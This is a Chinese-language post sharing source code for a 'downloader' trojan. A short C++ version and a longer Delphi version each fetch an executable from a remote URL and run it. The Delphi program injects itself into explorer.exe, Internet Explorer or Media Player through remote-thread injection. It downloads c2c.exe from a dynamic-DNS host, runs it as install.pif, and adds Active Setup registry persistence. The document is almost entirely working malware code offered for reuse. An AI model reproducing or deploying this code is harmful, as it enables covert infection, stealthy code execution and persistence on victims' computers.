下载者

 //下面是经我简化的小程序(在windowsXP,C++6.0下调试通过)
#include<windows.h>
#include<urlmon.h>
#include<process.h>
#include<Shellapi.h>  //这个头文件里有ShellExecute的定义
#pragma comment (lib,"Urlmon.lib")

int main()
{
        URLDownloadToFile(NULL,"http://127.0.0.1/mfc.exe","C:/My.exe",0,NULL);
        ShellExecute(0,"open","C:/My.exe",NULL,NULL,SW_SHOW);

        return 0;
}

 delphi版:

program InjectTheSelf;

{$IMAGEBASE $13140000}

uses Windows;
var
//动态加载shell32.dll中的ShellExecuteA函数
  ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
  Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;

//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
  vType := REG_SZ;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
  dLength := SizeOf(iename);
  if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  Result := iename
  else
  Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
  RegCloseKey(iekey);
end;
  //写注册表  用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
  result := false;
  RegCreateKey(key,PChar(subkey),regkey);
  if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
    result := true;
  RegCloseKey(regkey);
end;

//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
  vType := REG_SZ;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
  dLength := SizeOf(iename);
  if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
  Result := iename
  else
  Result := '%programfiles%/Windows Media Player/wmplayer.EXE';
  RegCloseKey(wmkey);
end;

procedure Download;  //下载过程
begin
  LoadLibrary('kernel32.dll');
  LoadLibrary('user32.dll');
  hShell:=LoadLibrary('Shell32.dll');
  hUrlmon:=LoadLibrary('urlmon.dll');
  @ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
  @Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
  Downfile(nil,'http://remoteip.3322.org/c2c.exe','c:/temp/install.pif', 0, nil);
  ShellRun(0,'open','c:/temp/install.pif',nil,nil,5);
  ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
  //这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
  Module := Pointer(GetModuleHandle(nil));
  //得到内存映像的长度
  Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
  SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
  //在Exp进程的内存范围内分配一个足够长度的内存
  VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
  //确定起始基址和内存映像基址的位置
  NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  //确定上面各项数据后,这里开始进行操作
  WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
  //建立远程线程,至此注入过程完成
  CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
  if InjType=0 then //注入explorer.exe
  begin
    //获取Exp进程的PID码
    GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
  end
   else
  if InjType=3 then //注入 media  player
  begin
    winexec(PChar(GetwmAppPath),sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
    end
  else  //注入iexplore.exe
  begin
    //CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
    winexec(PChar(GetIEAppPath),sw_hide);
    sleep(500);
    GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
  end;
  //打开进程
  ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
  Inject(ProcessHandle, @Download);
  //关闭对像
  CloseHandle(ProcessHandle);
end;
BEGIN
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath','c:/temp/install.pif');
RegDeleteKey(HKEY_current_user,'SOFTWARE/Microsoft/Active Setup/Installed Components/{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
RunInject(3);  //这里改为  ：1 注入iexplore.exe 0 注入explorer.exe     3注人media player
 end.